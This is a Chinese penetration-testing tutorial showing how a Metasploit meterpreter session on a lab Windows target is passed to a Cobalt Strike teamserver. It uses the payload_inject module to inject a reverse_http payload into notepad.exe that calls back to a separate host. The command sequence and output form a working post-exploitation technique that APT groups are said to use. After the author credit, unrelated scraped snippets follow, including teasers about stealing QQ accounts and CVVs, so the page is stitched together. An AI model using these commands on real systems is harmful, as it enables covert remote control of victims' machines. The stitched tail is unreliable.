Cobaltstrike作为一款协同APT工具,功能十分强大,针对内网的渗透测试和作为apt的控制终端功能,使其变成众多APT组织的首选,fireeye多次分析过实用cobaltstrike进行apt的案例。
cobaltstrike3新版的已经摒弃了metasploit,重写了所有的功能,但是鉴于metasploit功能的强大,cobaltstrike仍然保留了对metasploit的接口,今天我们不聊其他的,
只聊当我们使用metasploit获取到shell之后如何派生一个新的shell给cobaltstrike。系列参考我在安全脉搏上的:Cobalt strike browser pivot的应用实例
实验环境:
目标机器:windows server 2012 IP:192.168.81.150
metasploit机器:mac osx IP:192.168.1.103
cobaltstrike 机器:ubuntu 15.10 IP:192.168.81.135
首先,我们通过其他的途径,使用metasploit在payload在目标机器上获取了一个meterpreter:
进入我们获取到的meterpreter中
由于在metasploit的一些局限性和操作的不便利性,我们需要把metasploit获取到的shell派生出来一个新的shell,转交给cobaltstrike,方便我们协同渗透
在ubuntu机器上建立一个teamserver,然后本地链接,(仅仅为了演示,实际渗透中teamserver和client分开)
user@ubuntu:/pentest/exploits/framework3/cobaltstrike$ sudo https://www.secpulse.com/archives/teamserver 192.168.81.135 *** *** ***
[*] Generating X509 certificate and keystore (for SSL)
[+] Team server is up on 50050
[*] SHA1 hash of SSL cert is: d59e4862132ac9033c8f91216148bfd6d1049803
启动客户端链接,这里我们需要建立一个新的监听器:
ok,接下来,我们开始把macos上由metasploit获取的shell派生出一个新的shell转交给cobaltstrike,这里我们需要用到一个exploit: exploit/windows/local/payload_inject
这个exploit是注入一个新的payload到当前的session里面,我们看下具体的操作
exploit/windows/local/payload_injectmsfexploit(web_delivery) > use exploit/windows/local/payload_inject
msfexploit(payload_inject) > show options
Module options (exploit/windows/local/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
NEWPROCESS false no New notepad.exe to inject to
PID no Process Identifier to inject of process to inject payload.
SESSION yes The session to run this module on.
Exploit target:
Id Name
-- ----
0 Windows
msfexploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD=> windows/meterpreter/reverse_http
msfexploit(payload_inject) > set DisablePayloadHandler true
DisablePayloadHandler=> true
msfexploit(payload_inject) > set LHOST 192.168.81.135
LHOST=> 192.168.81.135
msfexploit(payload_inject) > set LPORT 8880
LPORT=> 8880
msfexploit(payload_inject) > set SESSION 1
SESSION=> 1
msfexploit(payload_inject) > exploit
[*]Launching notepad.exe...
[*]Preparing 'windows/meterpreter/reverse_http' for PID 3916
msfexploit(payload_inject) >
这里我解释一下这些参数,
由于cobaltstrike的监听器我们使用的是:windows/beacon_http/reverse_http,所以我们的payload也要使用:
PAYLOAD windows/meterpreter/reverse_http
设置本地监听ip和端口,由于我们的监听器是cobaltstrike的,所以要用到cobaltstrike机器的ip和端口
默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,这里我们设置
set DisablePayloadHandler true
设置我们的当前session,执行,看看ubuntu机器上的cobaltstrike是否已经接受了我们由metasploit派生出来的shell。
ok,ubuntu机器192.168.81.135上cobaltstrike已经有了一个新的shell,是由Mac主机192.168.1.103派生出来的新的,转交给cobaltstrike的。
在渗透过程中,不要仅限于单一模式的思路,根据实际的情况,选择更优的 *** 来进行下一步的渗透测试。
【原创作者:Sh@doM 授权投稿安全脉搏 安全脉搏 分享技术悦享品质】
微信是目前中国用户量最广的社交聊天软件,尤其是在微信钱包加入后,很多农村的中老年人也加入了微信用户的行列,微信更是年轻人手机上必不可少的app。微信聊天记录中保存着生活的点点滴滴,如果不小心删除了重要...
对付搜索引擎优化人员来说,天天审查要害词排名是一条不成文的法则。然而,从今朝的环境来看,我们发明百度的搜索引擎优化已经开始泛起出差异地域“成千上万的人和面目”的现象。 简朴的例子:当我在搜索要害词“帖...
本文目录一览: 1、《黑客帝国(1999)》免费在线观看完整版高清,求百度网盘资源 2、黑客帝国2完整版多长时间 3、《黑客帝国》完整版在线播放 《黑客帝国(1999)》免费在线观看完整版高...
记忆力减退。做事思想不集中。容易引起早泄,导致性功能异常。容易产生性幻想,想去尝试,易走上违法犯罪的道路。 可以使用杀毒软件进行杀毒是有用的,i,谨防被后台安装了木马程序同时建议您下次不要浏览不良网站...
董小姐尤其相信一句话:人这辈子会死三次 第一次是你的心脏停止跳动第二次是在葬礼上第三次是最后一个记得你的人死后 所以这世上总有些人,需要被活着的人铭记。 2003年4月1日,影响力涵盖整个华...
找一名黑客帮我盗QQ号相关问题 生活黑客的人相关问题 黑客如何盗取cvv 黑客qq神器破解插件apk(股票插件)...